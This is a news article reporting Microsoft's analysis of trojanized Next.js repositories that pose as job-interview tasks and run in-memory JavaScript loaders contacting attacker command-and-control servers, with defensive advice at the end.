Next.js developers are once again in the crosshairs as hackers seed malicious repositories disguised as legitimate projects, according to Microsoft, which said a limited set of those repos were directly tied to observed compromises.
Microsoft said the repositories use different methods to execute on developers’ machines, but all lead to the same outcome: in-memory execution of malicious JavaScript.
All of the execution paths identified by its research team are designed to trigger during the Next.js devs’ normal working routine. One, for example, abuses Visual Studio Code’s workspace automation to load files as soon as the dev opens and trusts the project.
In these cases, the variants tend to retrieve a JavaScript loader from Vercel and execute it using Node.js, then begin beaconing to attacker-controlled command-and-control (C2) infrastructure for further tasking.
Other paths involve the targeted developers running the project’s development server either directly or via npm run dev, where malicious logic embedded in trojanized assets or modified libraries (such as altered frontend files) retrieves and executes the loader. Others rely on victims starting the application’s backend, triggering preloaded logic hidden in backend modules during server initialization or module import.
Regardless of the path taken, the end result is always to register the affected device, run the JavaScript loader, and establish a connection with the attacker’s C2 infrastructure.
Using a separate C2 IP address and API set handed off by the initial stage, the controller retrieves a messages[] array of JavaScript tasks and executes them in memory using a separate Node interpreter to reduce on-disk artifacts.
This process also allows for data exfiltration. On developer machines, this could include anything from personal data to source code, secrets, or cloud resources.
Microsoft said the controller is capable of rotating its identifiers to prevent anti-malware solutions and human defenders from identifying patterns of suspicious activity, in addition to receiving the attacker’s instructions.
The controller will also obey kill-switch or shutdown commands, track the processes it spawns to prevent the victim from suspecting anything is awry based on performance issues, and report error telemetry, allowing attackers to tweak the commands that fail.
The projects are disseminated by miscreants under the guise that they are used as part of the hiring process, requiring developers to complete tasks related to job applications.
And while it’s difficult to imagine that targeted devs would complete these interview assessment tasks on a corporate machine, Microsoft warned that doing so could open up an organization to a wider compromise.
It added: “The key takeaway is that defenders should treat developer workflows as a primary attack surface and prioritize visibility into unusual Node execution, unexpected outbound connections, and follow‑on discovery or upload behavior originating from development machines.” ®
